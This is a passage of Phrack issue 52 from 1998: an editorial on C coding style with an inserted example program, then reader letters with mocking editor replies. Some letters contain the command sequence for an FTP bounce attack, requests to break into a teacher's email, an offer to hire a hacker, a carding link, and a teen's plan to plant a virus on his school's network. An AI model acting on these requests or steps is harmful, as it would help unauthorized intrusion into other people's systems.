---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 01 of 20

-------------------------[  P H R A C K     5 2   I N D E X

--------[  Choose your own $PATH adventure

Whew. You would be quite surprised at the evil wheels I had to set in motion in order to get this issue out. According to Newton, a Phrack Issue remains at rest or continues to move in a straight line with a uniform velocity if there is no unbalanced force acting on it. This issue was at rest. Its velocity was constant. And there were few forces acting on it. Anyhow, after many machinations it's here. Enjoy.

I have a gripe. Something upon which I'd like to dwell for a spell. Let's talk about coding aesthetic (from the C programming standpoint). Now, this is not a harangue about effective coding or efficient coding; I'll save those for some other time (perhaps for the time when I feel I can write effective and efficient code proficiently enough to vituperate to those who do not). I want to touch down on a few topics of visual appeal, which are overlooked so often. The five major areas I will cover are indentation, brace placement, use of whitespace, commenting, as well as variable and function nomenclature.

I suppose I should also mention that coding style is a personal preference type of thing. There are all kinds of schools of thought out there, and all kinds of methodologies on how to write pretty code. In the grand scheme of things, none are really any more correct than any others, except mine.

C is, for the most part, a format free programming language. Code can be written with all manner of whitespace, tabs, and newlines. The compiler certainly doesn't care. The machine doesn't care. This can be a double edged sword. There is quite a bit of room for artistic interpretation. And just like in real life, there is a lot of crappy art out there.

Indenting your code is a must. Please, do this. Indentation is here for one simple reason: to clearly and unequivocally define blocks of control.
However, 8 space tabstops are overkill. Unless you are using a 2 point font on a 13" screen, 4 spaces should easily define your control blocks. This allows you to maintain clarity on an 80 column screen while nesting blocks of control much deeper than you would with 8 space tab stops. 2 space tabstop advocates should be shot. However, don't let typography take over your code (a la ink obscuring the intent). If you have 7 million levels of indentation, perhaps you should rethink your approach to tackling the problem...

Bracing has a simple solution. The most effective use of bracing is in placing them on newlines so that they neatly enclose the area of control. This is especially important with nested levels of control. I know this generates empty lines. Oh well. They're free. Blocks of control become easily visible and it is easy to isolate one from another. This goes for functions as well as conditionals and loop structures. I know I go against K&R here. Oh well.

In the pursuit of clear, readable code, whitespace is your friend. Single space all keywords and all variables and constants separated by commas. It's a simple thing to do to drastically improve readability. When you have a series of assignments, one after another, it's a nice touch to line them up on the closest relative 4 space boundary. And please, no spaces between structure pointer operators and structure contents.

Commenting is a delicate matter. Descriptive, concise, well written code shouldn't really need commenting, or at least very much of it. But this isn't a rant about descriptive, concise, well written code. If you feel the need to comment your code, follow a few simple rules:

- Keep the comment block as small as possible.
- Don't tab out your comment frames to line up with each other. That's just plain fucking annoying. If you're doing that, you have too many comments anyway.
- Commenting datatype declarations rather than the functions that manipulate them is usually more helpful.
- If you must comment, keep your style as consistent as possible. If the commenting detracts from the readability of your code, you've just ponied up any clarification you might have achieved with the commenting.

The major exception to these rules is file headers. The beginning of source and header files should always have some descriptive information, including: file name, author, purpose, modification dates, etc... These comment blocks should always have a simple vertical line of unobtrusive asterisks, framed with the required forward slashes. People using C++ style commenting in C programs should be drawn and quartered. The other exception to this rule is when you are writing code specifically for the benefit of others. If the code is intended to be a learning tool, copious commenting is allowable.

Variable and function nomenclature should have connotation as to what their purpose in life is. As short as possible while still preserving some sort of identity. Descriptive names are wonderful, but don't go overboard. Generally, a condensed one or two word descriptor (possibly connected via an underscore) will work fine. And please, no mixed case. The only time uppercase characters should appear in C code is in symbolic constants and macros (and possibly strings and comments).

This tirade is the result of my experiences in reading and writing C code. In my travels as a stalwart mediocre programmer, I have progressed through many levels of maturity in my programming style. Much of my old code exhibits many of the very things eschewed as anathema in this jeremiad. Well, what can I say? I believe that I have grown. I am at home with the me. This is me breathing. (Tell me what movie that's from, and I will give you a Phrack Donut.)

Enjoy the magazine. It is by and for the hacking community. Period.
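To make the five conventions concrete, here is a small C file written to them: 4 space indentation, braces on their own lines, assignments lined up, the comment on the datatype rather than on each function, a framed file header, short lowercase names and uppercase symbolic constants. It is an example added for this edition, not code from the Phrack editorial; the ring buffer, its names, and the header's author and date are constructed for the illustration.

```c
/*
 * ring.c
 *
 * Author:   (constructed example, not Phrack code)
 * Purpose:  Fixed-capacity byte queue, written to the style rules above:
 *           4-space indent, braces on their own lines, aligned assignments,
 *           the comment on the datatype, short lowercase names, uppercase
 *           constants and macros only.
 * Modified: 1998-01-26 (date made up for the example)
 */

#include <stdio.h>
#include <string.h>

#define RING_SIZE   16                  /* bytes, must be a power of two */
#define RING_MASK   (RING_SIZE - 1)
#define RING_EMPTY  (-1)                /* ring_get() result when nothing is queued */

/*
 * One producer/consumer queue.  head is the next slot written, tail the
 * next slot read, and count the occupancy, so a full ring is never mistaken
 * for an empty one.  Both indices are masked with RING_MASK on every
 * advance, so they can never index past the end of data[].
 */
struct ring
{
    unsigned char data[RING_SIZE];
    unsigned int  head;
    unsigned int  tail;
    unsigned int  count;
};

void ring_init(struct ring *r)
{
    memset(r->data, 0, sizeof(r->data));
    r->head  = 0;
    r->tail  = 0;
    r->count = 0;
}

int ring_put(struct ring *r, unsigned char c)
{
    if (r->count == RING_SIZE)
    {
        return 0;                       /* full: the byte is refused, not overwritten */
    }
    r->data[r->head] = c;
    r->head          = (r->head + 1) & RING_MASK;
    r->count++;
    return 1;
}

int ring_get(struct ring *r)
{
    int c;

    if (r->count == 0)
    {
        return RING_EMPTY;
    }
    c       = r->data[r->tail];
    r->tail = (r->tail + 1) & RING_MASK;
    r->count--;
    return c;
}

unsigned int ring_count(const struct ring *r)
{
    return r->count;
}

unsigned int ring_put_str(struct ring *r, const char *s)
{
    unsigned int n = 0;

    while (*s != '\0' && ring_put(r, (unsigned char) *s))
    {
        s++;
        n++;
    }
    return n;                           /* bytes accepted before the ring filled */
}

int main(void)
{
    struct ring  r;
    unsigned int n;
    int          c;

    ring_init(&r);
    n = ring_put_str(&r, "0123456789abcdefXYZ");   /* 19 offered, only 16 fit */
    printf("accepted %u bytes, %u queued\n", n, ring_count(&r));
    while ((c = ring_get(&r)) != RING_EMPTY)
    {
        putchar(c);
    }
    putchar('\n');
    return 0;
}
```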
-- Editor in Chief ----------------[ route
-- Director of Public Operations --[ dangergirl
-- Phrack World News --------------[ disorder
-- Werdsmith ----------------------[ loadammo
-------- Elite --------------------> asriel
-- Santa vs. Jesus ----------------[ ISS vs. SNI
-- Festively Plump ----------------[ Cartman
-- Extra Special Thanks -----------[ No one.
-- Official Phrack CD -------------[ FLA/Flavour of the Weak
-- Official Phrack Drink ----------[ `The C Kilborn` (2.9 parts ketel one,
-----------------------------------| .1 parts tonic)
-- Shout Outs and Thank Yous ------[ Lords of Acid, cantor, Yggdrasil,
-----------------------------------| snokerash, Voyager, TNO, Jeff Thompson,
-----------------------------------| angstrom, redragon, Rob Pike, halflife
-- B.A. Baracus Phrack Fracas -----[ loadammo vs. Death Veggie
-- Original flip.c author (props) -[ datagram
-- Gas Face Given (drops) ---------[ solo, klepto

Phrack Magazine V. 8, #52, January 26, 1998.  ISSN 1068-1035

Contents Copyright (c) 1998 Phrack Magazine. All Rights Reserved. Nothing may be reproduced in whole or in part without written permission from the editor in chief. Phrack Magazine is made available quarterly to the public, free of charge. Go nuts people.
Subscription requests, articles, comments, whatever should be directed to:

    phrackedit@phrack.com

Submissions to the above email address may be encrypted with the following key:

As always, ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED. Phrack goes out plaintext. You certainly can subscribe in plaintext.

phrack:~# head -20 /usr/include/std-disclaimer.h
/*
 *  All information in Phrack Magazine is, to the best of the ability of the
 *  editors and contributors, truthful and accurate.  When possible, all facts
 *  are checked, all code is compiled.  However, we are not omniscient (hell,
 *  we don't even get paid).  It is entirely possible something contained
 *  within this publication is incorrect in some way.  If this is the case,
 *  please drop us some email so that we can correct it in a future issue.
 *
 *
 *  Also, keep in mind that Phrack Magazine accepts no responsibility for the
 *  entirely stupid (or illegal) things people may do with the information
 *  contained here-in.  Phrack is a compendium of knowledge, wisdom, wit, and
 *  sass.  We neither advocate, condone nor participate in any sort of illicit
 *  behavior.  But we will sit back and watch.
 *
 *
 *  Lastly, it bears mentioning that the opinions that may be expressed in the
 *  article of Phrack Magazine are intellectual property of their authors.
 *  These opinions do not necessarily represent those of the Phrack Staff.
 */

-------------------------[  T A B L E   O F   C O N T E N T S

 1  Introduction                                          Phrack Staff   12K
 2  Phrack Loopback                                       Phrack Staff   60K
 3  Line Noise                                            various        79K
 4  Phrack Prophile on o0                                 Phrack Staff   07K
 5  Everything a hacker needs to know about getting busted Agent Steal   72K
 6  Hardening the Linux Kernel                            daemon9        42K
 7  The Linux pingd                                       daemon9        17K
 8  Steganography Thumbprinting                           anonymous      35K
 9  On the Morality of Phreaking                          Phrack Staff   19K
10  A Quick NT Interrogation Probe                        twitch         18K
11  Subscriber Loop Carrier                               voyager        48K
12  Voice Response Systems                                voyager        18K
13  Pay Per View (you don't have to)                      cavalier       19K
14  The International Crime Syndicate Association         D. Demming     20K
15  Digital Certificates                                  Yggdrasil      14K
16  Piercing Firewalls                                    bishnu         31K
17  Protected mode programming and O/S development        mythrandir     76K
18  Weakening the Linux Kernel                            plaguez        27K
19  Phrack World News                                     Disorder       64K
20  extract.c                                             Phrack Staff   08K
                                                                        687K

-----------------------------------------------------------------------------

When Sen. Bob Kerrey (D-Neb.) was asked to define encryption, the results were horrific. "Well, I mean, to answer your question, I mean, encryption is -- the political equivalent of encryption is you ask me a question, I give you an answer and you don't understand it," he managed. "I mean, I intentionally garble the answer frequently. I intentionally garble the response so that you can't understand what I'm saying. And that's -- you notice that I've got the ability to do that."

-----------------------------------------------------------------------------

----[  EOF

---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 02 of 20

-------------------------[  P H R A C K     52   L O O P B A C K

--------[  Phrack Staff

[ Ed. note: The letters are perhaps edited for format, but generally not for grammar and/or spelling. I try not to correct the vernacular, as it often adds a colorful perspective to the letter in question.
]

0x1>--------------------------------------------------------------------------

[ P51-02@0x14: ...Xarthons submission about Linux IP_MASQ in Phrack 50... ]

In reply to Swift Griggs ranting about my stupidity, (and disrespekt i received from the rest of the AOL community)

Swift: the 'problem' in IP_MASQ which I reported was not meant to be considered a security problem, rather a notification of a potential problem, or at least this is what i was told. i stole this 'problem' from an evil hacker who works for the NSA. at the time, if i had been aware that the info i ripped from him was totally false, i would have said so in the letter. and believe me, if [named_removed] was awake more than 5 minutes a day i would be severely anal at him for informing me of this false intelligence.

the main thing the hacker/phracker/aol community needs to learn from this event is that when giving information to be ripped, it should be correct. next time ill make sure to reword the context i have pasted with GPM properly. btw, i must apologize for the tabs in this letter, pico has proven difficult to use. i must go, i have to pry this gerbil off my flaccid cock.

thanks, and keep hackin!

xarthon

0x2>--------------------------------------------------------------------------

[ P51-02@0x1b: You have our permission to write r00t on your backpack. ]

That may be the funniest response to a letter I have ever read. Your response to MICH Kabay was a close second. The wait was well worth it. I would rather see quality Phrack 2 or 3 times a yar than crap delivered every 3 months. I have to get back to reading now....

pip (John)

[ Go away Pip, nobody likes you. ]

0x3>--------------------------------------------------------------------------

[ P51-02@0x2c: I have a question regarding a certain piece of hardware... ]

It's a barcode scanner used at some terminals, such as public libraries.
You plug it in between the keyboard and the computer, and when you want to scan in a barcode from a book being checked out or an item being purchased, you push the button on the SCANNER and it outputs the barcode in ASCII numeric just as if it had been typed in from the keyboard.

So, now ya know.

Unknown/604

--

d00d, that's a s00p3r s3kr3t CIA, FBI g0vt. c0nspir@cY k3yb0ard f1lt3r!!@@!21

Actually, your mystery device sounds more like the "box" that connects between the keyboard and a barcode scanner. The "SCANNER" connector is where you'd plug in a typical "wand" or "gun" barcode reader. Not much you can do with it by itself, IMO. Again, it might be something else, but that's what it sounds like to me.

nate@millcomm.com

--

What this sounds like is the interface from one of the wand or lightgun-type laser barcode readers. These can be seen in action at some of the retail outlets around here for reading barcodes from clothing price tags or whatnot. One of those useful inventions that came out of turning 386's into POS terminals. It's probably useless without the accompanying wand, but you might keep it around and try to find the missing part.

wiz

--

[ We received a gaggle of responses to this inquiry. To those of you who sent in responses, our humblest thanks. ]

0x4>--------------------------------------------------------------------------

Hi! I need your help! Tell me, please, where I can find information via Internet about Carding (Scheme of reader/writer and etc.) thanks. Bye.

[ http://www.etexguide.com/cardtricks ]

0x5>--------------------------------------------------------------------------

[ P50-03: Portable BBS Hacking by: Khelbin ]

Dear Phrack,

An old article of mine entitled "Portable BBS Hacking" appeared in Phrack issue 50 under the line noise section. In Phrack 51, a reader expressed that he/she was frustrated at not being able to apply the techniques that were described in my article.
Please publish this response in Phrack 52.

Let me state right off the bat that "Portable BBS Hacking" was not written to specifically expose any one software-specific problem. Instead, the article introduced a potential security threat to all BBS software so that SysOps around the globe could check for such vulnerabilities and correct the problem if it was present. A 'mock' Renegade setup was used just because some software had to be used in order to explain the theory behind the attack.

Now to address the frustrated reader who is obviously aspiring to become an ever-so-elite BBS-h4x0r! While I often enjoy toking on a crack pipe, this method was tested prior to writing this article. It was tested on Renegade 04-x quite some time ago (as the article had been written some time ago, but never published). I currently run FreeBSD 2.2.2, so I haven't been able to do any more testing to help you hack BBS' and become ph33red. *BUT*, I am sure that versions of THD ProScan (a utility to scan uploaded files for viruses and other problems) will foil this attack. I am also sure (just by what I remember of how Renegade works) that if you follow the steps that I gave you in Phrack 50 correctly, upload a file, and then the SysOp were to (X)tract files from that file into \temp that it would work. I am also sure that there are other packages out there other than THD ProScan that do the same thing, but not in a secure fashion. The methods described in "Portable BBS Hacking" will also work with these packages. I hope you weren't just having Renegade check the file integrity with pkunzip -t or just view the contents of the zipfile.

Your response wasn't very specific so it's hard for me to be specific in this reply; however, I can tell that you also enjoy an occasional joint of crack, so feel free to contact me sometime and we'll smoke!
Yours Truly,
Khelbin Sunvold

0x6>--------------------------------------------------------------------------

Hi,

What program do I have to use in order to read the Phrack Magazine?

Thank you,
Adrian

[ We at Phrack Magazine do not explicitly endorse any particular program, however, many 12 step programs work wonders: Narcotics Anonymous, Overeaters Anonymous, Codependency Anonymous, Debtors Anonymous, Beyond Controloholism, Science Fiction Addiction, etc. Also try: `gzip -dc phrack.tgz | tar xvf -`. ]

0x7>--------------------------------------------------------------------------

Please allow me to introduce myself. My name is Itai Dor-on and I am a system integrator from Israel.

[ No introductions are necessary. ]

I got the phrack.com address from one of the subscribers on the firewalls@GreatCircle.COM mailing list in response to my inquiry on smtp exploits. (phrack 50)

[ shattered:~/Phrack/50:~> grep -i SMTP * | grep -i exploit
  shattered:~>

  There are no SMTP related exploits in Phrack 50. ]

I downloaded the file but it seems that it is encoded in a format which I can not read. I use windows 95/NT. I would like to know if there is a special viewer for the file.

[ See above letter. ]

Is there other informative information in the phrack.com site that is relevant to Security exploits in tcp/ip

[ Phrack 48 - 52 ]

I thank you in advance for any response

Yours Truly,
Itai Dor-on

0x8>--------------------------------------------------------------------------

Phrack is the best magazine of its kind I've ever seen !!! Maybe you could write something about tapping telephone wires in order to record data and fax on a portable tape recorder. I've read an article from Damnation that was pretty good, but maybe you could give me, and the other readers of course, some additional information.

I'm also interested in hacking the E-mail server of my ISP in order to read my teacher's mail, so what kind of program do I need to do this ? I know his login but I don't know his password.
I've got a terminal program called Dialog that doesn't seem to be very useful, but maybe you know a better one ?!?

Now, my last question: I'm using CuteFTP to log on to my homepage's folder. One day I've found some write protected folders and files, so my question is how do I get access to these files and how do I go to other folders to which I'm not allowed to go (hidden, write-protected, etc.) ?

Thank you very much in advance !

Host

[ I had a flame all ready and prepared, but this letter really seems to set itself on fire. ]

0x9>--------------------------------------------------------------------------

Hey guys, I'm a first time reader and, well duh, first time responder to yer mag...I must say that I am thoroughly impressed with what you've all put together...as a Linux user, it shall certainly be a very useful utility/resource for me...I just nabbed the 51st issue and it rocks thus far...downloading the other issues as I type this...just thought you might like to know ya got another reader who is overjoyed at getting off his lazy ass and finally reading yer mag which i've heard about in the past... Ezines never were something for me but i said fuckit and went for Phrack.. your mag is the most informative and entertaining Ezine that i've seen to date (and i been on the 'net for 4+ years now...that might say something) anyhow, enuf blabber from me, L8!

-GnEaThEg0d

[ Well, thank you very much. ]

0xa>--------------------------------------------------------------------------

I'd like to congratulate Narbo on his brief introduction to CCS7. I was beginning to think that no one was interested in telecommunications anymore.

[ Agreed. Note that we would very much appreciate further submissions of this kind. ]

One thing I'd like to add for Phrack's Japanese audience is that they are the odd balls when it comes to signaling data links. While signaling data links are 56kbps in North America and 64kbps virtually everywhere else, Japan uses 4.8kbps links.
Actually I guess we, in North America, are also a little odd at 56kbps but at least it's closer to the norm. :)

-khelbin

0xb>--------------------------------------------------------------------------

Yea, I wanna subscribe to phrack..This is my e-mail address..noah6@juno.com...Sign me up if I'm writing the right place..if not..tell me how to subscribe later oh yea..I know I'm not supposed to ask..but I don't have internet access..I could use all the back issues of phrack in one big long letter if you could..I can't receive files with this account..so if you could cut and paste or some shit... later

[ Sure. Let me get right on that. Even better, what's your postal address? I'll have the Phrack Tactical Team deployed to your house to come hit you on the head with a tack hammer because you are a retard. ]

0xc>--------------------------------------------------------------------------

Good issue, by the way...

[ Thanks! ]

So whassup with the Milla pictures? Did you mention them in P51-1 just to taunt us? How do you get the _non_ASCII version of P51? You're too cruel... :-)

JSRS

[ Sorry. That's Carl's fault. He's new. (Moo. Moo moo.) ]

0xd>--------------------------------------------------------------------------

To the Anti-Christ,

[ Apparently, there was a postal mix-up and we are now getting Satan's mail. ]

When I grow up I want to be just like you.

[ Great! So, I'll see you at the next Klan-youth meeting? ]

That said, can you walk the talk? If so, I have a challenge for you.

[ 'walk the talk'? Note: This is email. Something you've mailed to a whiley bunch of knuckle-knobs. And quite possibly something that could be used to make others laugh at your expense. In the future, take the time to grammar and spell check your letters to minimize the emotional damage you are bound to suffer. ]

I am a neophyte in the DarkSide, and need some help catching/avoiding a phreaker, hence the interest in your mag. He breaks into phone lines at home and work.
Tapes conversations and interjects various rude noises on important calls. Do you have any ideas as to what I can/should do to protect my

[ Sommy! ]

privacy and catch this guy? If this is not within your realm of expertise, can you refer me to someone for whom it is?

[ Try the PHONE COMPANY. ]

Don't take my initial inquiry as anything but an effort to become part of the hacker/phreaker world for the sake of my own protection. I

[ For your own protection, I suggest NOT becoming part of *any* community. Live the rest of your life as a hermit inside a hollowed-out oaktree. ]

understand there are many 'good' hackers in your world willing to offer assistance in this arena. Your assistance would be greatly appreciated. Thanks.

0xe>--------------------------------------------------------------------------

Sirs,

First, thanks for the obvious hard work that goes into your 'zine. I guess I'm what you would call a "tryin' to be". I've got all the back issues and read some every day. I was just reading 51, and had to say that besides all the other great things in the 'zine, it's great to see some people still have a great f*ckin' sense of humor.

Thanx again,
(too busy trying to learn to have come up with a cool handle)...R

[ Stop it. I'll get a big head. ]

0xf>--------------------------------------------------------------------------

I am a newbie hacker/freaker/cracker/sometimes anarchist. I have read some of your first Phrack issues and I LOVED EM! Especially the bomb making! I am gonna try that stuff when I finally go to my dad's house later on this year....I wanna blow shit up!! I have a submission that you are gonna get sooner or later about making the ULTIMATE pipe bomb....it is REALLY destructive...

THANK YOU
Demonhawk

[ ATTN Delinquent parents: Increase Ritalin by 0.5 mg/Kg.
]

0x10>-------------------------------------------------------------------------

Day in the Life of a Teenage Hacker: Story of My Current Non-Life
By: Demonhawk

I wake up, staring at the ceiling for ten minutes before my mother finally walks in and says, "Time to get up!" I stand and dress myself. Wearing the only thing that I can think of that I like, blue jeans and just whatever shirt looks best at the time. I go and comb my hair (walking to my mom's end of the trailer house to use that bathroom because mine doesn't have a mirror, nor a sink, nor more than 10x10 feet of space). I walk back to my room and get my books ready for school. The block schedule makes my backpack EXCRUCIATINGLY heavy on B days while on A days it is light as a feather. I lay down-most of the time-and go back to sleep. Others I turn my computer's monitor on and type something for a while (my mom says it is bad to leave your computer on all night, WRONG! Little does she fuckin' know it is better to leave it on!).

It is time to go to school and my mom drives me to the middle school (Connally Middle School) where I go in and play on the computers until school starts (get there 30 mins early). I go to my first class, still groggy from the little rest I had the night before while I lay awake in my bed pondering what I could do to the school's computer system. The recently installed network (Novell) was supposedly student proof (little do they know). I have the software and I could hack it easy. Crack the passwords that the teachers think they are so smart to have one that a student can't guess. I think about the consequences of hacking 'em, then realize that it would be stupid to hack 'em, after all, I am the only one smart enough on the computers to hack em. I can crack Windows passwords (easy) with a boot disk (or even booting into dos). Last year, I will remember angrily, I remember how I got a bum wrap for crashing a teacher's computer.
I was on it then absent for a week and then come back to find out all fingers were being pointed at me. I got kicked off the annual "good kid's" Six Flag trip and that REALLY pissed me off. Then, as the first period teacher begins to yell something like "Get to work!" (I am in shop first period) I wake up and realize I had been thinking. Most of the period I will talk to my friends about hacking (the two-maybe three-friends I have in that class) and they will ask me computer questions and I will answer them (and if I don't know an answer I will make one up, after all, they have no idea how to use a computer to its full limitations). After a few more minutes of thinking I realize a virus will be the way to go. The only problem is putting it on the computer. How? Well, maybe if I can get access to a teacher's computer while she/he is out of the room. Yeah, that would be the only way. But the witnesses (who am I kidding the kids up there would LOVE to see the computers crash, in fact, I have been offered $$$MONEY$$$ to crash em). I think about the virus idea for a moment. Yeah, that is the way to do it.

First period is over. I move to my second class. It is a no brainer (on both of the days) and I have a lot of time to plot out my plan. Trojan Horse. Yes, or maybe Darth Vader...as a calling card. Yeah, that would be the way to go. The Trojan Horse virus followed up by the Darth Vader virus. Yes. Well, I have one of those two. Now lets think here. How to gain access to the computer at school. The teacher looks at me and tells me to "get to work!" and I look at him/her and reply, "But I am already finished!" and they leave me alone. But, maybe I should wait until I am in High School (when the entire district will have the internet) and I could port in and leave the virus. Yeah, that would work, I couldn't be blamed since I wouldn't go to the Middle School any longer. That is a possibility.
I cheat at my math for a while (copying the back of the book for some easy answers) not because I am dumb, hell no, I am in Algebra I in the 8th grade for Christ's sake! No, I am just lazy, except when it comes to the computers.

Second period is over. I walk to my third class of the day, an hour till lunch when I get to talk to my ENTIRE 5 friends at one time (there are some almost friends in this group, people I get along with and, yes, on occasion like to hang around with). You see, I am a "nerd" and proud to be one! Now, this is the thing. I am not just ANY nerd, I am a nerd with RED hair and fairly THICK glasses with THICK frames (I want contact lenses that have mirrored silver on the outside but I am not allowed to have them for some fucking unknown reason). I do my work, hoping that lunch will come, and eventually it does. I walk down the halls meeting a friend or two along the way, getting pushed by hicks that don't think computers are "cool". (Just as something that made people think I did a speech in Drama class on how computers are gonna crash in 2000 because of the Millennium Bug. One kid almost pissed in his pants when I told them safety systems on Nuclear power plants might go offline and how that all cars with electronic timers that shut down until an inspection won't run. Plus power might go out, I think that made them appreciate computer freaks like you and me just a LITTLE more since WE are the only ones that can save them from that hideous fate!!) I am laughed at because I run an internet Star Wars club (The Conflict at www.geocities.com/Area51/Zone/9875 ). But they don't laugh when I tell them I can hack into the school's computers. They look at me dumbfounded and then make some smart ass remark. I look at them for a second and walk away, I know they don't understand how much of a computer GENIUS I am. Well, to tell the truth I am NOT really a computer GENIUS. Well, in some ways I am.
I mean I CRAVE knowledge like I CRAVE food when I am hungry and water when I am thirsty. I can't get enough computer knowledge, I ALWAYS need more (currently I am learning C, C++ JAVA, JAVAScript, Visual Basic, and QBasic <----I forgot most of what I used to know on that one) I eat my lunch (usually Nachos but sometimes Lays potato chips and an ice cream) and then go outside where I get an RC Cola. The bell rings and we are all herded back inside the main building where we suffer out the rest of the day. I make it past the rest of 3rd with no problem. Then comes fourth. It is a little nerve racking to sit there while time slowly slips by, waiting for that bell to ring so that you can be set free of this hellish place.

The bell rings and I leave the school, heading outside where the buses load. Mine is the last and after an hour of waiting it arrives (thank GOD I am the first one off) and I go inside my nice, cool house. I turn my computer on (if it is off) and begin my homework (I lie about having homework so that I can play on the computer without being touched by my mother). I wash the dishes and water the dogs. Then I sit down and play on the computer a little bit. I get on the internet a little while later. I learn a LITTLE more hacking and play some games over the internet (ain't technology wonderful???). I am far from being an 31337 hacker, but I am doing some good a little. I am basically a newbie but I can still hack Novell (childs play). After a while of this I take a shower and lie down in bed, dreading the next day (unless, of course, it is a weekend).

And that, is my Non-Life.

[ ATTN DELINQUENT PARENTS: Increase Ritalin by 1201293 mg/Kg. ]

0x11>-------------------------------------------------------------------------

Dear sir,

First off, i think phrack is a wonderful publication, the best of its kind and better than most, if not all, of the computer related commercial publications.
You and your staff are doing a great job and please keep up the excellent work :)

[ So, we're better than 2600. Thanks! *That's* the validation we needed! ]

That said, I have a request. I'm writing a paper on the hacking subculture and such a project would be, to say the least, severely lacking without the inclusion of groups like Phrack Inc., 10pht, and

[ Phrack is not incorporated. And you mean `l0pht`. ]

r00t. So I would greatly appreciate it if you could fit it into your

[ You are already severely lacking. You failed to mention the guild. You even forgot b0w. ]

doubtless busy schedule to send me a history of Phrack. It can be as brief or as in-depth as you'd like. From just the date of creation and pivotal events in Phrack history to a summary of every passing member's contributions to the publication.. anything you can send will be an asset to me. Also, if you or any of your staff members would be so

[ I'll get some of my interns right on that. Alhambra! Get to it! ]

gracious and godly-wonderful as to answer the few questions below that would also be greatly, GREATLY appreciated.

Q: What is your most commonly used handle and why did you choose it?

[ `route`. Cos I thoroughly route my foes. And also cos I route through all my girlfriends' purses when they are in the bathroom. ]

Q: What is your position at Phrack?

[ I AM PHRACK. ]

Q: When did you realize you were a hacker (or phreaker, cracker, whatever applies to you)?

[ It is something you are born with. It is not something you learn. There is no single moment of realization. It is something you just `are`. It is this inexplicable and inexorable pursuit of knowledge. To learn. To break. To fix. To push. To optimize. To learn. To hack. ]

Q: What do you think hacking is Really about?

[ Oh c'mon man. Chicks and Money. That's what it ALL boils down to. ]

Q: How do you think the 'scene' has changed, and where would you like to see it go?

[ See P48-02a ]

Q: If you could say anything to the community at large about hacking, what would it be?

[ Um. Most of what you people consider hacking is simply a justification or shield for doing illegal acts. ]

One last thing, do you know where (email, www address, whatever) I could contact current or former members of 10pht, r00t, or any real

[ Um. Let's see. http://www.l0pht.com. http://www.r00t.org. And so on. You're not a very smart person. ]

group (ie: not one of the lame new groups trying, unsuccessfully, to copy the greatness of the older groups)? Any response, including negation so I can search elsewhere, would be greatly appreciated. Thank you for your time.

Weaver

0x12>-------------------------------------------------------------------------

Is it possible to "Hide" your ip while on tcp/ip connection if so how? Thanx

[ Yes, look into Onion Routing. ]

0x13>-------------------------------------------------------------------------

Hi Phrack-editors,

I'm looking for a good and experienced hacker to hack a German site. There is enough money involved to satisfy you.

[ My price is quite high. Actually, fuck it. I don't want money. Give me flesh and fame. Get me some elite movie role where I am the hero and Milla Jovovich is my love interest. Then we'll talk. ]

I will give you more information with further correspondence. Please let me know soon if you are interested, (just reply to this usa.net address), thank you,

Diogenes

0x14>-------------------------------------------------------------------------

I recently read about the ancient ftp bounce attack. I have tried it and it works on versions of ftp that are lower than wu-2.4.2. Here's what I do.

[Receiving Machine, no system req's except write access]
TYPE I
PASV (Gives IP then port)
STOR

[Sender Machine w/ver 2.4 or lower]
TYPE I
PORT
RETR

[Receiving Machine]
Binary Mode Transfer Started

It then goes on to get the file. But...
If it is a wu-2.4.2 ver computer, the sender machine says Illegal PORT Command when you type the IP and port of the receiving computer. You can only do a PORT command that includes the IP address that I am coming from. Sorry to say I don't know how to do any kind of source route or IP spoofing, although I'd be interested to hear if this was the only answer, and am not sure if there is a way to get around this.

0x15>-------------------------------------------------------------------------

how can I phreak successfully in Germany???

[ The Germans hated me when I was there. I think they hate all Americans. Something to do with WWII or something I guess. ]

0x16>-------------------------------------------------------------------------

Hello there :) Probably u don't know who I am ...

[ Definitely. ]

well, I'm an italian boy and I wish to say ya one thing ... You're Great.

[ Oh. C'mon now... Really? ]

I've just start to reading Phrack (the last issues) and I guess that it's a very cool wonderful zine.

[ Get out. You think so? ]

Why am I tell ya this ?? Well, since I think that one person is as ya ... well he's great.

[ Now stop that. I'm really getting embarrassed. ]

I'm trying to learn something from ya (and I shall overcome .... I hope :) ) I'm interesting in hacking .. but I'm not like some other ppl that always ask "How can I be an hacker ??" "where I can find something to became root" I guess that they haven't understood nothing The REAL HACKER (for me) is an expert, has an etic and he hack to learn The knowledge is one of the thing most important in the world (the other ones are the GIRLS =) ) So I won't ask ya how to be an hacker ... (even cause you'll propbably say me FUCK YOU ;) ) we're so far but maybe one day we could meet :) to share our knowledge

[ Wait a minute. Are you coming on to me? ]

Well, Thanx a lot and excuse me for all the time you spent to read this letter Excuse me also for my terrible english

[ NP. Luckily Aleph1 was over, so he translated for me (`course, then I needed someone to translate that, too). ]

Cool and great stuff has Phrack =)

[ Agreed. Great stuff has Phrack. ]

0x17>-------------------------------------------------------------------------

Hi, I noticed that you fixed up your web page, and that's nice, but my problem is, that when I downloaded the phrack 51 issue, it came like this: " phrack51.tar.gz " so,....what kind of program do I use to open it? Can you just put all issues in zip format? That would help us all!

[ 'Us all'? You are of course referring to the entire moron population. Phrack does not cater to the morons of the world, sorry. Try 2600. I hear their target audience is a bit thicker skulled. ]

0x18>-------------------------------------------------------------------------

Hi,

I sent you an email a while back asking you to forward a message to an author of one of your articles, since he wanted to remain anonymous. However I never got any reaction either from the author or from you. It's really important for me that I find him to discuss some technicalities. The article was; "How to make your own telecards" Volume Seven, Issue Forty-Eight, File 10 (and 11) of 18

Did you manage to send the email off to him successfully? All I want is for him to contact me on this address (raven@swipnet.se). If he wants to remain anonymous he could easily create an email account on www.hotmail.com or another service of that kind. It would be very nice of you to forward this email to the author of the article and reply to me whether it was sent successfully or if it bounced back.

thanks

[ This is the best we can do. ]

0x19>-------------------------------------------------------------------------

Hey there... is there any way to get phrack in just one big file instead of getting it in a lot of separate files? Thanks...
Thanks, Crystalize

[ `cat phrack* > master_phrack.blob` ]

0x1a>-------------------------------------------------------------------------

im having trouble finding uk phreak iNfOs! can u help me out? im looking 4 bt c7 info and uk payphones. cheers

[ Hrm. I know several Brits who like me tho. And I like them, too. Much more than the Germans. The .uk girls are waaay prettier too. ]

0x1b>-------------------------------------------------------------------------

HELP> Your the Best I need your help FAST

[ AHM THE BEST!@ ]

I have 2 files in Corel Word Perfect 7.0 that have pass words on them I need the Fast Can you help? Or know anyone who can? I'm in the U.S.

